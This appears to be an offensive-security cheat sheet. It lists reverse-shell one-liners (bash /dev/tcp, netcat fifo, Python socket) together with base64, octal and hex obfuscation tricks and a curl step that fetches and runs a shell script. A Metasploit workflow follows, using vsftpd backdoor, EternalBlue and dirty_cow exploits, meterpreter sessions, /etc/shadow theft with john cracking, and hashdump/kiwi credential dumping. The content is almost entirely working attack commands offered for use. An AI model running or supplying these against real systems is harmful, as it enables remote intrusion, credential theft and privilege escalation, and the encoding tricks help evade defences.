Socat

bash -c 'bash -i >& /dev/tcp/10.10.10.14/9001 0>&1' rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f Reverse Shell Payload with Encoded Command bash -c echo${IFS}YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTAuMTQvOTAwMSAwPiYx|base64${IFS}-d|bash bash -c {echo,YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTAuMTQvOTAwMSAwPiYx}|{base64,-d}|{bash,-i} Best way to escape bad character (Recommended) echo "bash -c 'exec bash -i &>/dev/tcp/10.10.14.37/9001 <&1'" > revshell.sh curl$IFS'10.10.14.37/revshell.sh'$IFS'-o'$IFS'/tmp/revshell.sh' bash$IFS'/tmp/revshell.sh' Reverse Shell by using octal escape sequences Generating RevShell (escape sequence) echo -n "/bin/sh -c 'sh -i >& /dev/tcp/10.10.14.56/9001 0>&1'" | od -An -vto1 | tr -d '\n ' | sed 's/\([0-7]\{3\}\)/\\&/g' echo -n "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.56\",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/sh\")'" | od -An -vto1 | tr -d '\n ' | sed 's/\([0-7]\{3\}\)/\\&/g' Generating RevShell (Hex escape sequence) echo -n "sh -c 'exec sh -i &>/dev/tcp/10.10.14.56/9001 <&1'" | xxd -p|tr -d '\n'|sed 's/../\\x&/g' Executing RevShell (Never forgot to URL encode if you are sending via HTTP/s method) printf '\057\142\151\156\057\163\150\040\055\143\040\047\057\142\151\156\057\163\150\040\055\151\040\076\046\040\057\144\145\166\057\164\143\160\057\061\060\056\061\060\056\061\064\056\065\066\057\071\060\060\061\040\060\076\046\061\047'|sh Additional Shell Options and Tools Don’t forget to check with other shells such as sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, and bash. Additionally, consider using Socat for more flexibility: ...

🌐 1.Start Metasploit Console sudo systemctl start postgresql msfconsole Initialize the Metasploit Database (First Time Only) msfdb init 🔍 2. Scanning Targets Quick Target Discovery nmap -sn 10.10.10.0/24 Full Port + Version Scan (Integrated with Metasploit DB) db_nmap -sC -sV -O -Pn 10.10.10.129 View Discovered Hosts & Services hosts services 🪡 3. Exploit Search and Module Use Search by service name or CVE search vsftpd search type:exploit name:smb Load a Module use exploit/unix/ftp/vsftpd_234_backdoor Explore Module Info info # Shows full module details (author, platform, options, etc) show options # Required + optional settings (RHOSTS, LHOST, etc) show advanced # Advanced options like threads, timeouts, proxies show payloads # Compatible payloads for this exploit 💡 4. Linux Exploitation Workflow Example: FTP Backdoor use exploit/unix/ftp/vsftpd_234_backdoor set RHOSTS 10.10.10.129 set payload cmd/unix/interact run If Shell is Basic: Upgrade python3 -c 'import pty; pty.spawn("/bin/bash")' Or Use Web Delivery use exploit/multi/script/web_delivery set payload linux/x86/meterpreter/reverse_tcp set LHOST <your_ip> set LPORT 4444 run Post-Exploitation (Linux) sessions -i 1 getuid sysinfo Enumerate OS and Configs run post/linux/gather/enum_os run post/linux/gather/enum_configs Dump Password Hashes download /etc/passwd download /etc/shadow john shadow --wordlist=/usr/share/wordlists/rockyou.txt Local Exploit Suggestion run post/multi/recon/local_exploit_suggester Example Local Root Exploit use exploit/linux/local/dirty_cow set SESSION 1 run Confirm Root id whoami 💻 5. Windows Exploitation Workflow Example: EternalBlue use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 10.10.10.130 set LHOST <your_ip> set payload windows/x64/meterpreter/reverse_tcp run Session Handling sessions sessions -i 1 sysinfo getuid Post-Exploitation (Windows) Dump Hashes hashdump load kiwi kiwi_cmd "lsadump::sam" Process Migration ps migrate <pid> getpid Privilege Escalation getsystem Or use: ...